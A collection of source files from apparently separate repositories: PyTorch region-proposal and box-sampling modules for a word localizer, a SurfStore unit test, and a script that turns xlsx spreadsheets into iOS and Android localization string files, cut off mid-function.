new_line = str(x1) + ' ' + str(y1) + ' ' + str(x2) + ' ' + str(y2) + ' '
for s in line_split[4: -1]:
new_line += s + ' '
new_line += line_split[-1] + '\n'
new_lines.append(new_line)
with open('./bw_out/{}.txt'.format(i), 'w', encoding='utf-8') as f:
f.writelines(new_lines)
img = img[row_start: row_end, col_start: col_end]
color_img = color_img[row_start: row_end, col_start: col_end]
cv2.imwrite("./bw_out/{}.jpg".format(i), img)
cv2.imwrite("./color_out/{}.jpg".format(i), color_img)
shutil.copyfile('./bw_out/{}.txt'.format(i), './color_out/{}.txt'.format(i))
```
#### File: rcnn/misc/batch_bilinear_sampler_bhwd.py
```python
import torch
import torch.nn.functional as F
"""
BatchBilinearSamplerBHWD efficiently performs bilinear sampling to pull out
multiple patches from a single input image.
Inputs:
- inputImages: Tensor of shape (H, W, C)
- grids: Tensor of shape (N, HH, WW, 2)
Output:
- Tensor of shape (N, HH, WW, C) which is the result of applying each
sampling grid to the input image.
"""
class BatchBilinearSamplerBHWD(torch.nn.Module):
def check(self, input):
inputImages = input[0]
grids = input[1]
assert inputImages.ndimension() == 4
assert inputImages.size(0) == grids.size(0) # batch
assert grids.size(3) == 2 # coordinates
def forward(self, input):
# -- inputImages should be C x H x W
# -- grids should be B x HH x WW x 2
inputImages, grids = input[0], input[1]
assert grids.dim() == 4
B = grids.size(0)
assert inputImages.dim() == 3
C, H, W = inputImages.size(0), inputImages.size(1), inputImages.size(2)
inputImageView = torch.unsqueeze(inputImages, dim=0).expand(B, C, H, W)
self.check((inputImageView, grids))
output = F.grid_sample(inputImageView, grids)
return output
```
#### File: rcnn/misc/box_sampler.py
```python
import torch
import torch.nn as nn
from . import utils
from . import box_utils
from . import boxIoU
class BoxSampler(nn.Module):
def __init__(self, opt, logger):
super(BoxSampler, self).__init__()
self.opt = {}
self.low_thresh = utils.getopt(opt, 'low_thresh', 0.4)
self.high_thresh = utils.getopt(opt, 'high_thresh', 0.75)
self.batch_size = utils.getopt(opt, 'batch_size', 256)
self.x_min, self.x_max = None, None
self.y_min, self.y_max = None, None
self.logger = logger
def unpack_dims(self, input_boxes, target_boxes):
N, B1 = input_boxes.size(0), input_boxes.size(1)
B2 = target_boxes.size(1)
assert N == 1, "Only 1-element minibatches are supported"
assert input_boxes.size(2) == 4 and target_boxes.size(2) == 4
assert target_boxes.size(0) == N
return N, B1, B2
def setBounds(self, bounds):
self.x_min = utils.getopt(bounds, 'x_min', None)
self.x_max = utils.getopt(bounds, 'x_max', None)
self.y_min = utils.getopt(bounds, 'y_min', None)
self.y_max = utils.getopt(bounds, 'y_max', None)
def forward(self, input):
with torch.no_grad():
input_boxes, target_boxes = input
# B1 = k * H * W
# B2 = number of words
N, B1, B2 = self.unpack_dims(input_boxes, target_boxes)
# For now, only support batch size of 1
input_boxes = input_boxes.view(B1, 4)
target_boxes = target_boxes.view(B2, 4)
# N x B1 x B2
# 1 X B1 x B2 overlaps between B1 input boxes and B2 gt boxes
ious = boxIoU.boxIoU(input_boxes, target_boxes).view(N, B1, B2)
# N x B1
# find the gt box having max overlap with each input box
input_max_iou, input_idx = torch.max(ious, dim=2)
# input_max_iou = input_max_iou.view(N, B1)
# N x B2
# find the input box having max overlap with each gt box
_, target_idx = torch.max(ious, dim=1)
# target_max_iou = target_max_iou.view(N, B2)
# N x B1
pos_mask = torch.gt(input_max_iou, self.high_thresh)
# N x B1
neg_mask = torch.lt(input_max_iou, self.low_thresh)
# remove over-bounded boxes
if self.x_min and self.y_min and self.x_max and self.y_max:
boxes_x1y1x2y2 = box_utils.xcycwh_to_x1y1x2y2(input_boxes)
x_min_mask = torch.lt(boxes_x1y1x2y2[:, 0], self.x_min).byte()
y_min_mask = torch.lt(boxes_x1y1x2y2[:, 1], self.y_min).byte()
x_max_mask = torch.gt(boxes_x1y1x2y2[:, 2], self.x_max).byte()
y_max_mask = torch.gt(boxes_x1y1x2y2[:, 3], self.y_max).byte()
pos_mask[x_min_mask] = 0
pos_mask[y_min_mask] = 0
pos_mask[x_max_mask] = 0
pos_mask[y_max_mask] = 0
neg_mask[x_min_mask] = 0
neg_mask[y_min_mask] = 0
neg_mask[x_max_mask] = 0
neg_mask[y_max_mask] = 0
# -- Count as positive each input box that has maximal IoU with each target box,
# -- even if it is outside the bounds or does not meet the thresholds.
# -- This is important since things will crash if we don't have at least one
# -- positive box.
# print("in box_sampler, total_pos:{}, total_neg:{}".format(pos_mask.sum().item(),
# neg_mask.sum().item()))
if pos_mask.sum().item() == 0:
pos_mask = pos_mask.scatter_(1, target_idx, 1)
neg_mask = neg_mask.scatter_(1, target_idx, 0)
pos_mask = pos_mask.view(B1).byte()
neg_mask = neg_mask.view(B1).byte()
if neg_mask.sum() == 0:
# -- There were no negatives; this can happen if all input boxes are either:
# -- (1) An input box with maximal IoU with a target box
# -- (2) Out of bounds, therefore clipped
# -- (3) max IoU to all target boxes is in the range [low_thresh, high_thresh]
# -- This should be a pretty rare case, but we still need to handle it.
# -- Ideally this should do something like sort the non-positive in-bounds boxes
# -- by their max IoU to target boxes and set the negative set to be those with
# -- minimal IoU to target boxes; however this is complicated so instead we'll
# -- just sample from non-positive boxes to get negatives.
# -- We'll also log this event in the __GLOBAL_STATS__ table; if this happens
# -- regularly then we should handle it more cleverly.
neg_mask = 1 - pos_mask # set neg_mask to inverse of pos_mask
self.logger.warning("In box_sampler.py, no negatives!")
# [total_pos, 1]-> total_pos
# containing pos boxes index in the total boxes
pos_mask_nonzero = pos_mask.nonzero().view(-1)
# [total_neg, 1]-> total_neg
neg_mask_nonzero = neg_mask.nonzero().view(-1)
total_pos = pos_mask_nonzero.size(0)
total_neg = neg_mask_nonzero.size(0)
num_pos = int(min(self.batch_size // 2, total_pos))
num_neg = self.batch_size - num_pos
pos_p = torch.ones(total_pos)
neg_p = torch.ones(total_neg)
# sample num_pos boxes from total_positive
pos_sample_idx = torch.multinomial(pos_p, num_pos, replacement=False)
neg_replace = total_neg < num_neg
neg_sample_idx = torch.multinomial(neg_p, num_neg, replacement=neg_replace)
if input_boxes.is_cuda:
pos_sample_idx = pos_sample_idx.cuda()
neg_sample_idx = neg_sample_idx.cuda()
# containing the positive box indexes in the total boxes after sampling
pos_input_idx = pos_mask_nonzero[pos_sample_idx]
# find the corresponding target box indexes
pos_target_idx = input_idx.view(-1)[pos_input_idx].view(num_pos)
neg_input_idx = neg_mask_nonzero[neg_sample_idx]
output = (pos_input_idx, pos_target_idx, neg_input_idx)
return output
```
#### File: rcnn/misc/localization_layer.py
```python
import torch
import easydict
import torch.nn as nn
import torch.nn.functional as F
from . import utils
from . import box_utils
from .make_anchors import MakeAnchors
from .box_sampler_helper import BoxSamplerHelper
from .bilinear_roi_pooling import BilinearRoiPooling
from .apply_box_transform import ApplyBoxTransform
from .invert_box_transform import InvertBoxTransform
from .reshape_box_features import ReshapeBoxFeatures
from .box_regression_criterion import BoxRegressionCriterion
class RPN(nn.Module):
def __init__(self, opt):
super(RPN, self).__init__()
if isinstance(opt.anchors, torch.Tensor): # debug mode
self.anchors = torch.Tensor(opt.anchors).t().clone()
elif opt.anchors == 'original':
# 2 x k w, h
self.anchors = torch.Tensor([[30, 30], [60, 60], [80, 80], [100, 100], [120, 120],
[30, 45], [60, 90], [80, 120], [100, 150], [120, 180],
[30, 20], [60, 20], [90, 60], [105, 70], [120, 80]]).t().clone()
self.anchors = self.anchors * opt.anchor_scale
# k
self.num_anchors = self.anchors.size(1)
self.std = opt.std
self.zero_box_conv = opt.zero_box_conv
s = 1
self.pad = opt.rpn_filter_size // 2
self.conv_layer = nn.Conv2d(opt.input_dim, opt.rpn_num_filters,
kernel_size=opt.rpn_filter_size, padding=self.pad)
self.head_filter_size = 1
self.box_conv_layer = nn.Conv2d(opt.rpn_num_filters, 4 * self.num_anchors, self.head_filter_size, stride=s)
self.rpn_conv_layer = nn.Conv2d(opt.rpn_num_filters, 2 * self.num_anchors, self.head_filter_size, stride=s)
self.reshape_box_features = ReshapeBoxFeatures(self.num_anchors)
x0, y0, sx, sy = opt.field_centers
self.make_anchors = MakeAnchors(x0, y0, sx, sy, self.anchors, opt.tunable_anchors)
self.apply_box_transform = ApplyBoxTransform()
self.box_conv_layer.weight.data.zero_()
self.box_conv_layer.bias.data.zero_()
self.w = opt.box_reg_decay
def init_weights(self):
with torch.no_grad():
self.conv_layer.weight.normal_(0, self.std)
self.conv_layer.bias.zero_()
if self.zero_box_conv:
self.box_conv_layer.weight.zero_()
else:
self.box_conv_layer.weight.normal_(0, self.std)
self.box_conv_layer.bias.zero_()
self.rpn_conv_layer.weight.normal_(0, self.std)
self.rpn_conv_layer.bias.zero_()
def forward(self, feats):
feats = F.relu(self.conv_layer(feats))
# Box branch
# Compute boxes
bfeats = self.box_conv_layer(feats)
act_reg = 0.5 * self.w * torch.pow(bfeats.norm(2), 2)
# create anchors according to feature shape
# this is the original anchor
anchors = self.make_anchors(bfeats)
# N x (D * k) x H x W-> N x (k * H * W) x D
anchors = self.reshape_box_features(anchors)
# reshape transforms and apply to anchors
# N x (D * k) x H x W-> N x (k * H * W) x D
trans = self.reshape_box_features(bfeats)
# calculate new x, y, w, h for anchor boxes
boxes = self.apply_box_transform((anchors, trans))
# Scores branch
scores = self.rpn_conv_layer(feats)
# N x (D * k) x H x W-> N x (k * H * W) x D
scores = self.reshape_box_features(scores)
return (boxes, anchors, trans, scores), act_reg
class LocalizationLayer(nn.Module):
def __init__(self, opt, logger):
super(LocalizationLayer, self).__init__()
# has its own opt
self.logger = logger
self.opt = easydict.EasyDict()
self.opt.input_dim = utils.getopt(opt, 'input_dim')
self.opt.output_size = utils.getopt(opt, 'output_size')
self.opt.field_centers = utils.getopt(opt, 'field_centers')
self.opt.mid_box_reg_weight = utils.getopt(opt, 'mid_box_reg_weight')
self.opt.mid_objectness_weight = utils.getopt(opt, 'mid_objectness_weight')
self.opt.rpn_filter_size = utils.getopt(opt, 'rpn_filter_size', 3)
self.opt.rpn_num_filters = utils.getopt(opt, 'rpn_num_filters', 256)
self.opt.zero_box_conv = utils.getopt(opt, 'zero_box_conv', True)
self.opt.std = utils.getopt(opt, 'std', 0.01)
self.opt.anchor_scale = utils.getopt(opt, 'anchor_scale', 1.0)
self.opt.anchors = utils.getopt(opt, 'anchors', 'original')
self.opt.sampler_batch_size = utils.getopt(opt, 'sampler_batch_size', 256)
self.opt.sampler_high_thresh = utils.getopt(opt, 'sampler_high_thresh', 0.6)
self.opt.sampler_low_thresh = utils.getopt(opt, 'sampler_low_thresh', 0.3)
self.opt.train_remove_outbounds_boxes = utils.getopt(opt, 'train_remove_outbounds_boxes', 1)
self.opt.verbose = utils.getopt(opt, 'verbose')
self.opt.box_reg_decay = utils.getopt(opt, 'box_reg_decay', 5e-5)
self.opt.tunable_anchors = utils.getopt(opt, 'tunable_anchors', False)
self.opt.backprop_rpn_anchors = utils.getopt(opt, 'backprop_rpn_anchors', False)
self.stats = easydict.EasyDict()
self.dtp_train = utils.getopt(opt, 'dtp_train', False)
if self.dtp_train:
self.opt.sampler_batch_size //= 2
sampler_opt = {'batch_size': self.opt.sampler_batch_size,
'low_thresh': self.opt.sampler_low_thresh,
'high_thresh': self.opt.sampler_high_thresh}
self.rpn = RPN(self.opt)
self.box_sampler_helper = BoxSamplerHelper(sampler_opt, logger)
self.roi_pooling = BilinearRoiPooling(self.opt.output_size[0], self.opt.output_size[1])
self.invert_box_transform = InvertBoxTransform()
# Construct criterions
if self.opt.backprop_rpn_anchors:
self.box_reg_loss = BoxRegressionCriterion(self.opt.mid_box_reg_weight)
else:
self.box_reg_loss = nn.SmoothL1Loss() # for RPN box regression
self.box_scoring_loss = nn.CrossEntropyLoss()
self.image_height = None
self.image_width = None
self._called_forward_size = False
self._called_backward_size = False
def setImageSize(self, image_height, image_width):
self.image_height = image_height
self.image_width = image_width
self._called_forward_size = False
self._called_backward_size = False
def setTestArgs(self, args={}):
self.test_clip_boxes = utils.getopt(args, 'clip_boxes', True)
self.test_nms_thresh = utils.getopt(args, 'nms_thresh', 0.7)
self.test_max_proposals = utils.getopt(args, 'max_proposals', 300)
def init_weights(self):
self.rpn.init_weights()
def forward(self, input):
if self.training:
return self._forward_train(input)
else:
return self._forward_test(input)
def _forward_train(self, input):
cnn_features, gt_boxes = input[0], input[1]
# Make sure that setImageSize has been called
# different size for each image
assert self.image_height and self.image_width and not self._called_forward_size, \
'Must call setImageSize before each forward pass'
self._called_forward_size = True
N = cnn_features.size(0)
assert N == 1, 'Only minibatches with N = 1 are supported'
# B1 is the number of words in this page
assert gt_boxes.dim() == 3 and gt_boxes.size(0) == N and gt_boxes.size(2) == 4, \
'gt_boxes must have shape (N, B1, 4)'
# Run the RPN forward
# N x (D * k) x H x W-> N x (k * H * W) x D
# (boxes, anchors, trans, scores ,act_reg
# boxes: anchor boxes after regression in xc, yc, w, h, size are in original picture size!
# these four data are all in the last column
# anchors: original anchors
# trans: output from regression branch
# scores: output from score branch
rpn_out, act_reg = self.rpn.forward(cnn_features)
if self.opt.train_remove_outbounds_boxes == 1:
bounds = {'x_min': 0, 'y_min': 0, 'x_max': self.image_width, 'y_max': self.image_height}
self.box_sampler_helper.setBounds(bounds)
sampler_out = self.box_sampler_helper.forward((rpn_out, (gt_boxes,)))
# Unpack pos data
pos_data, pos_target_data, neg_data = sampler_out
# pos_trans, pos_scores are used for calculating loss
#
pos_boxes, pos_anchors, pos_trans, pos_scores = pos_data
# Unpack target data
pos_target_boxes = pos_target_data[0]
# Unpack neg data (only scores matter)
neg_boxes, neg_scores = neg_data
rpn_pos, num_neg = pos_boxes.size(0), neg_scores.size(0)
# Compute objectness loss
pos_labels = torch.ones(rpn_pos, dtype=torch.long)
neg_labels = torch.zeros(num_neg, dtype=torch.long)
if cnn_features.is_cuda:
pos_labels = pos_labels.cuda()
neg_labels = neg_labels.cuda()
obj_weight = self.opt.mid_objectness_weight
obj_loss_pos = obj_weight * self.box_scoring_loss(pos_scores, pos_labels)
obj_loss_neg = obj_weight * self.box_scoring_loss(neg_scores, neg_labels)
self.stats.obj_loss_pos = obj_loss_pos.detach()
self.stats.obj_loss_neg = obj_loss_neg.detach()
if self.opt.backprop_rpn_anchors:
reg_loss = self.box_reg_loss.forward((pos_anchors, pos_trans), pos_target_boxes)
else:
# Compute targets for RPN bounding box regression
# detach since no gradients needed for targets
# paramters needed to transform the boxes, [num_pos, 4]
pos_trans_targets = self.invert_box_transform.forward((pos_anchors, pos_target_boxes)).detach()
# DIRTY DIRTY HACK: To prevent the loss from blowing up, replace boxes
# with huge pos_trans_targets with ground-truth
max_trans = torch.abs(pos_trans_targets).max(1)[0]
max_trans_mask = torch.gt(max_trans, 100).view(-1, 1).expand_as(pos_trans_targets)
mask_sum = max_trans_mask.float().sum() / 4
# This will yield correct graph according to https://discuss.pytorch.org/t/how-to-use-condition-flow/644/5
if mask_sum.detach().item() > 0:
self.logger.warning('Masking out %d boxes in LocalizationLayer' % mask_sum.detach().item())
pos_trans[max_trans_mask] = 0
pos_trans_targets[max_trans_mask] = 0
# Compute RPN box regression loss
weight = self.opt.mid_box_reg_weight
reg_loss = weight * self.box_reg_loss.forward(pos_trans, pos_trans_targets)
self.stats.box_reg_loss = reg_loss.detach()
# Fish out the box regression loss
self.stats.box_decay_loss = act_reg.detach()
# Compute total loss
total_loss = obj_loss_pos + obj_loss_neg + reg_loss + act_reg
if self.dtp_train:
dtp_sampler_out = self.box_sampler_helper.forward(((input[2],), (gt_boxes,)))
dtp_pos_data, dtp_pos_target_data, dtp_neg_data = dtp_sampler_out
dtp_pos_boxes = dtp_pos_data[0]
dtp_pos_target_boxes = dtp_pos_target_data[0]
dtp_neg_boxes = dtp_neg_data[0]
pos_boxes = torch.cat((pos_boxes, dtp_pos_boxes), dim=0)
neg_boxes = torch.cat((neg_boxes, dtp_neg_boxes), dim=0)
pos_target_boxes = torch.cat((pos_target_boxes, dtp_pos_target_boxes), dim=0)
# Concatentate pos_boxes and neg_boxes into roi_boxes
roi_boxes = torch.cat((pos_boxes, neg_boxes), dim=0)
# Run the RoI pooling forward for roi_boxes
self.roi_pooling.setImageSize(self.image_height, self.image_width)
roi_features = self.roi_pooling.forward((cnn_features[0], roi_boxes))
# roi_features are the cnn features after bilinear_pooling
output = (roi_features, roi_boxes, pos_target_boxes, total_loss)
if self.dtp_train:
output += (rpn_pos,)
return output
# Clamp parallel arrays only to valid boxes (not oob of the image)
# use in test!
def clamp_data(self, data, valid):
# data should be 1 x kHW x D
# valid is byte of shape kHW
assert data.size(0) == 1, 'must have 1 image per batch'
assert data.dim() == 3
mask = valid.view(1, -1, 1).expand_as(data)
return data[mask].view(1, -1, data.size(2))
def _forward_test(self, input):
cnn_features = input
arg = easydict.EasyDict({'clip_boxes': self.test_clip_boxes,
'nms_thresh': self.test_nms_thresh,
'max_proposals': self.test_max_proposals})
# Make sure that setImageSize has been called
assert self.image_height and self.image_width and not self._called_forward_size, \
'Must call setImageSize before each forward pass'
self._called_forward_size = True
rpn_out, act_reg = self.rpn.forward(cnn_features)
rpn_boxes, rpn_anchors, rpn_trans, rpn_scores = rpn_out
num_boxes = rpn_boxes.size(1)
del rpn_anchors
del rpn_trans
# Maybe clip boxes to image boundary
if arg.clip_boxes:
bounds = {'x_min': 1,
'y_min': 1,
'x_max': self.image_width,
'y_max': self.image_height}
rpn_boxes, valid = box_utils.clip_boxes(rpn_boxes, bounds, 'xcycwh')
# print(string.format('%d/%d boxes are predicted valid',
# torch.sum(valid), valid:nElement()))
# Clamp parallel arrays only to valid boxes (not oob of the image)
rpn_boxes = self.clamp_data(rpn_boxes, valid)
rpn_scores = self.clamp_data(rpn_scores, valid)
num_boxes = rpn_boxes.size(1)
# Convert rpn boxes from (xc, yc, w, h) format to (x1, y1, x2, y2)
rpn_boxes_x1y1x2y2 = box_utils.xcycwh_to_x1y1x2y2(rpn_boxes[0])
# Convert objectness positive / negative scores to probabilities
rpn_scores_exp = torch.exp(rpn_scores)
pos_exp = rpn_scores_exp[0, :, 0]
neg_exp = rpn_scores_exp[0, :, 1]
scores = (pos_exp + neg_exp).pow(-1) * pos_exp
if self.opt.verbose:
self.logger.info('in LocalizationLayer forward_test')
self.logger.info('Before NMS there are %d boxes' % num_boxes)
self.logger.info('Using NMS threshold %f' % arg.nms_thresh)
# Run NMS and sort by objectness score
boxes_scores = torch.cat((rpn_boxes_x1y1x2y2, scores.view(-1, 1)), dim=1)
if arg.max_proposals == -1:
idx = box_utils.nms(boxes_scores.detach(), arg.nms_thresh)
else:
idx = box_utils.nms(boxes_scores.detach(), arg.nms_thresh, arg.max_proposals)
rpn_boxes_nms = torch.squeeze(rpn_boxes)[idx]
if self.opt.verbose:
self.logger.info('After NMS there are %d boxes' % rpn_boxes_nms.size(0))
output = rpn_boxes_nms
return output
def eval_boxes(self, input):
"""
performs bilinear interpolation on the given boxes on the input features.
Useful for when using external proposals or ground truth boxes
Boxes should be in xc, yc, w, h format
"""
cnn_features, boxes = input
# Use roi pooling to get features for boxes
self.roi_pooling.setImageSize(self.image_height, self.image_width)
features = self.roi_pooling.forward((cnn_features[0], boxes))
return features
```
#### File: rcnn/misc/reshape_box_features.py
```python
import torch
"""
Input a tensor of shape N x (D * k) x H x W
Reshape and permute to output a tensor of shape N x (k * H * W) x D
"""
class ReshapeBoxFeatures(torch.nn.Module):
def __init__(self, k):
super(ReshapeBoxFeatures, self).__init__()
self.k = k
def forward(self, input):
N, H, W = input.size(0), input.size(2), input.size(3)
D = input.size(1) // self.k
k = self.k
# [N,(D*k),H,W]->[N,k,H,W,D]
a = input.view(N, k, D, H, W).permute(0, 1, 3, 4, 2).contiguous()
output = a.view(N, k * H * W, D)
return output
```
#### File: locator/rcnn/opts.py
```python
import argparse
import easydict
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-sampler_batch_size', default=256,
help='Batch size to use in the box sampler', type=int)
parser.add_argument('-num_pos', default=0, help='Number of positive examples', type=int)
parser.add_argument('-sampler_high_thresh', default=0.75,
help='Boxes IoU greater than this are considered positives', type=float)
parser.add_argument('-sampler_low_thresh', default=0.4,
help='Boxes with IoU less than this are considered negatives', type=float)
parser.add_argument('-train_remove_outbounds_boxes', default=1,
help='Whether to ignore out-of-bounds boxes for sampling at training time', type=int)
# Model
parser.add_argument('-std', default=0.01, help='std for init', type=int)
parser.add_argument('-init_weights', default=1,
help='Whether to initialize weight for rpn and two final fc', type=int)
# Loss function
parser.add_argument('-mid_box_reg_weight', default=0.1, help='Weight for box regression in the RPN', type=float)
parser.add_argument('-mid_objectness_weight', default=0.5, help='Weight for box classification in the RPN',
type=float)
parser.add_argument('-end_box_reg_weight', default=0.1, help='Weight for box regression in the recognition network',
type=float)
parser.add_argument('-end_objectness_weight', default=0.5,
help='Weight for box classification in the recognition network', type=float)
parser.add_argument('-weight_decay', default=1e-5, help='L2 weight decay penalty strength', type=float)
parser.add_argument('-box_reg_decay', default=5e-5,
help='Strength of pull that boxes experience towards their anchor', type=float)
# Data input settings
parser.add_argument('-image_size', default=1720, help='which fold to use', type=int)
parser.add_argument('-dtp_train', default=1, help='Whether or not to use DTP in train', type=int)
# Optimization
parser.add_argument('-learning_rate', default=2e-4, help='learning rate to use', type=float)
parser.add_argument('-reduce_lr_every', default=12000, help='reduce learning rate every x iterations', type=int)
parser.add_argument('-beta1', default=0.9, help='beta1 for adam', type=float)
parser.add_argument('-beta2', default=0.999, help='beta2 for adam', type=float)
parser.add_argument('-epsilon', default=1e-8, help='epsilon for smoothing', type=float)
parser.add_argument('-max_iters', default=10000, help='Number of iterations to run; -1 to run forever', type=int)
parser.add_argument('-pretrained', action='store_true', help='Load model from a checkpoint instead of random initialization.')
parser.add_argument('-model_path', help='path to the pretrained model')
# Model checkpointing
parser.add_argument('-eval_every', default=200, help='How often to test on validation set', type=int)
# Test-time model options (for evaluation)
parser.add_argument('-test_rpn_nms_thresh', default=0.4,
help='Test-time NMS threshold to use in the RPN', type=float)
parser.add_argument('-max_proposals', default=-1,
help='Number of region proposal to use at test-time', type=int)
parser.add_argument('-score_nms_overlap', default=0.5,
help='NMS overlap using box scores in postprocessing', type=float)
parser.add_argument('-score_threshold', default=0.65,
help='score threshold using box scores in postprocessing', type=float)
parser.add_argument('-dtp_test', default=1, help='Whether or not to use DTP in test', type=int)
parser.add_argument('-test_batch_size', default=128, help='Whether or not to use DTP', type=int)
# Visualization
parser.add_argument('-print_every', default=10, help='How often to print the latest images training loss.',
type=int)
parser.add_argument('-out_path', default='out', help='output dir for intermediate results')
# Misc
parser.add_argument('-save_id', default='', help='an id identifying this run/job')
parser.add_argument('-quiet', default=0, help='run in quiet mode, no prints', type=int)
parser.add_argument('-verbose', default=0, help='print info in localization layer in test', type=int)
parser.add_argument('-gpu', default=1, help='use gpu or not.', type=int)
parser.add_argument('-clip_final_boxes', default=1, help='Whether to clip final boxes to image boundar', type=int)
args = parser.parse_args()
return easydict.EasyDict(vars(args))
```
#### File: locator/utils/util.py
```python
import os
def mkdir(dir_name):
if not os.path.isdir(dir_name):
try:
os.makedirs(dir_name)
except OSError:
print('Can not make directory for {}'.format(dir_name))
raise OSError
else:
print("Make directory for {}".format(dir_name))
else:
print("{} already exists".format(dir_name))
``` |
{
"source": "joker452/SimpleRaft",
"score": 3
} |
#### File: SimpleRaft/tests/test_surfstore.py
```python
import os
import unittest
from hashlib import sha256
from src.surfstore import SurfStore
class TestServerAlone(unittest.TestCase):
"""
Test server basic functionality without RPC and client
"""
def setUp(self) -> None:
self.server = SurfStore()
def test_get_set_blocks(self):
b = os.urandom(4096)
self.server.putblock(b)
self.assertEqual(b, self.server.getblock(sha256(b).digest()))
def test_info(self):
infos = self.server.getfileinfomap()
self.assertEqual(infos, {})
file_name = 'lala.txt'
infos = {file_name:
[1,
[sha256(os.urandom(4096)).digest(),
sha256(os.urandom(4096)).digest(),
sha256(os.urandom(4096)).digest()]]}
self.server.updatefile(file_name, infos[file_name][0], infos[file_name][1])
self.assertEqual(infos, self.server.getfileinfomap())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "Joker462/mobile-csv-localizer",
"score": 3
} |
#### File: mobile-csv-localizer/Resources/xlsx2strings.py
```python
import sys, argparse, logging, os, importlib
from openpyxl import load_workbook
# Python 3.8 and more
importlib.reload(sys)
PLATFORM = None
IN_PATH = None
OUT_PATH = None
LANG_KEYS = None # static will change later
# Gather our code in a main() function
def main(args, loglevel):
logging.basicConfig(format="%(message)s", level=loglevel)
PLATFORM = args.platform
IN_PATH = args.input
OUT_PATH = args.output
print('\n')
logging.info("Start Localizing .... ")
print('\n')
logging.info("------------------------------------")
# check source path
logging.debug("\n")
logging.debug("Validating source path ...")
logging.debug("\n")
if not os.path.exists(IN_PATH):
logging.error('Source path not found, Invalid path.')
logging.debug("\n")
return
logging.debug("Valid source path, finding csv file ...")
logging.debug("\n")
logging.debug("Validating target path ...")
logging.debug("\n")
# check output path
if not os.path.exists(OUT_PATH):
logging.error('Target path not found, Invalid path.')
logging.debug("\n")
return
logging.debug("Valid target path, generating output directory ...")
logging.debug("\n")
# generate output directory
OUTPUT_DIR = os.path.join(OUT_PATH, "Output/{0}".format(PLATFORM))
if not os.path.exists(OUTPUT_DIR):
os.makedirs(OUTPUT_DIR)
logging.debug("Output directory generated : %s" % OUTPUT_DIR)
logging.debug("\n")
else:
logging.debug("Using output directory: %s" % OUTPUT_DIR)
logging.debug("\n")
logging.debug("\n")
if PLATFORM == "ios":
logging.debug("Platform : %s" % PLATFORM)
elif PLATFORM == "android":
logging.debug("Platform : %s" % PLATFORM)
else:
logging.warn("Invalid platform, platform should be ios, android.")
logging.debug("\n")
logging.error('ERROR LOCALIZING.\n')
return
logging.info("Generated output directory: %s" % OUTPUT_DIR)
generate_keys(IN_PATH, OUTPUT_DIR, PLATFORM)
print('\n')
logging.info("DONE LOCALIZING.\n")
def generate_keys(source_path, output, platform):
base_out_dir = output
full_out_paths = None
allwrites = None
for dirname, dirnames, filenames in os.walk(source_path):
for f in filenames:
filename, ext = os.path.splitext(f)
if ext != '.xlsx':
continue
fullpath = os.path.join(dirname, f)
# create language key
workbook = load_workbook(fullpath)
worksheet = workbook.active
first_row = worksheet[1]
line = []
for cell in first_row:
line.append(cell.value)
# remove the first element in first row cause this has value 'key'
LANG_KEYS = line[1:] # assign new value to key
# iterate each language
lang_path = ""
for lang in LANG_KEYS:
if platform == "ios":
lang_path = os.path.join(base_out_dir, "{0}.lproj/".format(lang))
if platform == "android":
lang_path = os.path.join(base_out_dir, "values-{0}/".format(lang))
# Generate directory per language key
if not os.path.exists(lang_path):
os.makedirs(lang_path)
if platform == "ios":
full_out_paths = [os.path.join(base_out_dir, "{0}.lproj/".format(langKey) + "Localizable.strings") for langKey in LANG_KEYS]
if platform == "android":
full_out_paths = [os.path.join(base_out_dir, "values-{0}/".format(langKey) + "strings.xml") for langKey in LANG_KEYS]
allwrites = [open(out_path, 'w') for out_path in full_out_paths]
if platform == "ios":
start_localize_ios(source_path, allwrites, LANG_KEYS)
if platform == "android":
start_localize_android(source_path, allwrites, LANG_KEYS)
# =========================================================================
# ++++++++++++++++++++++++ Check available ++++++++++++++++++++++++++++++++
# =========================================================================
def check_availability(element, collection):
return element in collection
def to_unicode_or_bust(obj, encoding='utf-8'):
if isinstance(obj, basestring) and encoding:
if not isinstance(obj, unicode):
obj = unicode(obj, encoding)
return obj
# =========================================================================
# ++++++++++++++++++++++++++++++ iOS ++++++++++++++++++++++++++++++++++++++
# =========================================================================
def start_localize_ios(source_path, all_writes, lang_keys):
allwrites = all_writes
for dirname, dirnames, filenames in os.walk(source_path):
for f in filenames:
filename, ext = os.path.splitext(f)
if ext != '.xlsx':
continue
fullpath = os.path.join(dirname, f)
workbook = load_workbook(fullpath)
worksheet = workbook.active
# skip first line (it is header).
rows = worksheet.iter_rows(min_row=2)
# Header
[fwrite.write('/*\n Localizable.strings\n*/\n') for fwrite in allwrites]
my_key_list = ['']
for row in rows:
row_key = row[0].value
# comment
if row_key == '':
continue
elif row_key[:2] == '/*':
[fwrite.write('\n{key}\n'.format(key=row_key)) for fwrite in allwrites]
continue
# check contains
elif check_availability(row_key, my_key_list):
continue
my_key_list.append(row_key)
row_values = [row[i+1] for i in range(len(lang_keys))]
# if any row is empty, skip it!
if any([value.value == '' for value in row_values]):
[fwrite.write('\n') for idx, fwrite in enumerate(allwrites)]
else:
[fwrite.write('"{key}" = "{lang}";\n'.format(key=row_key, lang=row_values[idx].value)) for idx, fwrite in enumerate(allwrites)]
[fwrite.close() for fwrite in allwrites]
# =========================================================================
# ++++++++++++++++++++++++++++++ Android ++++++++++++++++++++++++++++++++++
# =========================================================================
def start_localize_android(source_path, all_writes, lang_keys):
allwrites = all_writes
[fwrite.write('<?xml version="1.0" encoding="utf-8"?>\n') for fwrite in allwrites]
[fwrite.write('<resources>') for fwrite in allwrites]
for dirname, dirnames, filenames in os.walk(source_path):
for f in filenames:
filename, ext = os.path.splitext(f)
if ext != '.xlsx':
continue
fullpath = os.path.join(dirname, f)
workbook = load_workbook(fullpath)
worksheet = workbook.active
# skip first line (it is header).
rows = worksheet.iter_rows(min_row=2)
# Header
[fwrite.write('\n<!--\n Localizable.strings\n-->\n') for fwrite in allwrites]
my_key_list = ['']
for row in rows:
row_key = row[0].value
if row_key == '':
continue
# comment
elif row_key[:2] == '/*':
[fwrite.write('\n<!-- {key} -->\n'.format(key=row_key.replace("/*", "").replace("*/", ""))) for fwrite in allwrites]
continue
# check contains
elif check_availability(row_key, my_key_list):
continue
my_key_list.append(row_key)
row_values = [row[i+1] for i in range(len(lang_keys))]
# if any row is empty, skip it!
if any([value.value == '' for value in row_values]):
[fwrite.write('\n') for idx, fwrite in enumerate(allwrites)]
else:
